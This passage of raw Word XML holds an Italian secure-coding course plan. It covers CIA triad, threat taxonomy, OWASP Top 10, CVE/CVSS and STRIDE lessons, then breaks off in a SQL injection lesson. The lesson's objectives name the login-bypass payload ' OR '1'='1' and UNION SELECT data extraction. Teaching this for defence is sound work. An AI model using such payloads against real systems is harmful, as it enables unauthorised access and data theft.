              <w:t xml:space="preserve">Frontale + lavagna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0:40 – 0:55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Sicurezza del codice vs sicurezza infrastrutturale</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: differenza, casi, perché un firewall NON ferma SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale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0:55 – 1:10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PAUSA</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ verifica setup PC dei discenti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1:10 – 1:30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Tassonomia minacce</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(overview): malware, phishing, MITM, DoS, web app, supply chain, zero-day, insider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slide tassonomia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:30 – 1:50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5 Principi Secure Coding</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con esempi positivi/negativi: Least Privilege, Defense in Depth, Fail Secure, KISS, Separation of Duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Checklist sezione 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:50 – 2:00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Discussione aperta</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“Voi avete mai pensato alla sicurezza nelle UF di programmazione?”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ presentazione del calendario delle 8 lezioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Discussione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="materiali-per-il-docente"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide adattate da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/M1_slide_fondamenti.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del repo 32h (~20 slide)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lavagna per disegnare CIA Triad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Storia di Equifax pronta (3-4 frasi memorizzate)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="X1a65ad2b4d90ba16abe2bc289b6f85c2af62fe1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il discente (consegnati a fine lezione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checklist Secure Coding completa (stampata)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link al repo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss4i/corso-stem-ifts-secure-coding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="verifica-in-itinere"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fine lezione,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 domande a campione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Tre proprietà CIA?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Differenza tra Defense in Depth e Least Privilege?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Cosa è successo a Equifax in 1 frase?”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se la classe non risponde, recupera 5 minuti nella prossima lezione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="compito-per-l2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Letture autonome:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sezione 1-2 della Checklist Secure Coding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Aggiornare il proprio Python a 3.12 se non già fatto</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="errori-da-evitare-in-aula"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare in aula</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Iniziare con la normativa: noiosa, si perde la classe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Slide piene di testo: usa esempi concreti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Non distribuire la Checklist subito: serve come riferimento per tutto il modulo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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L2 — OWASP Top 10 + Threat Modeling (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="obiettivi-formativi-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa cosa è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e cosa contiene la Top 10:2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa leggere un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e capire un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applica un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">threat model leggero (STRIDE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a un piccolo sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disegna un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Data Flow Diagram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con trust boundary</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="articolazione-minuto-per-minuto-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ripasso rapido L1 (3 domande)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Q&amp;A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:25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OWASP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: chi sono, cosa producono (Top 10, ASVS, cheat sheet). Overview delle 10 voci 2021/2025 con un esempio per ognuna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:25 – 0:45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CVE/CVSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: formato CVE-AAAA-NNNNN, dove cercarli (NVD), come si legge il CVSS Base Vector. Esercizio live: cerchiamo CVE-2021-44228 (Log4Shell) → CVSS 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:45 – 1:00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PAUSA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1:00 – 1:15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Threat Modeling</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: cos’è, perché farlo PRIMA del codice. Le 4 domande di Shostack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:15 – 1:30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STRIDE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 6 categorie con un esempio per ognuna in un’app web tipica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:30 – 1:45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Data Flow Diagram</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 4 simboli (entità, processo, datastore, flusso) + trust boundary. Esempio guidato su mini app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:45 – 2:00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Workshop a coppie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: applicare STRIDE a un sistema fittizio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“blog con login”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— almeno 5 minacce identificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab a coppie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="esercizio-workshop-stride-15-min"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esercizio workshop STRIDE (15 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distribuisci foglio bianco. Sistema:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; Un blog con: login utenti, post degli utenti (CRUD), commenti pubblici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consegna: disegnare DFD (utente, frontend, backend, DB) e identificare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">almeno 5 minacce STRIDE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(almeno 1 per ogni lettera).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output di ogni coppia: una tabella con 5 righe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Elemento | STRIDE | Descrizione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discussione collettiva (5 min): ogni coppia espone 1 minaccia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="materiali-per-il-docente-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide adattate da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/M5_slide_secdesign.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sezioni STRIDE + DFD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NVD aperto in browser per demo CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lavagna grande per DFD</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="verifica-in-itinere-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Workshop STRIDE = verifica formativa. Se i gruppi producono &lt;3 minacce → ripasso STRIDE 5 min in L3.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="compito-per-l3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leggere sezione 4 della Checklist (Database)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installare DB Browser for SQLite (se non già fatto in UF 11)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="errori-da-evitare"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Spiegare tutte e 10 le voci OWASP in dettaglio: bastano 3-4 oggi (le altre nelle lezioni dedicate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Andare in profondità sui CVSS sub-vectors: basta capire le bande (Low/Medium/High/Critical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Saltare il workshop STRIDE: è il momento in cui si</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“applica”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un metodo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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L3 — SQL Injection (2h) ⭐ CUORE TECNICO</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="obiettivi-formativi-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riconosce a vista una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un login bypass con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">estrarre dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
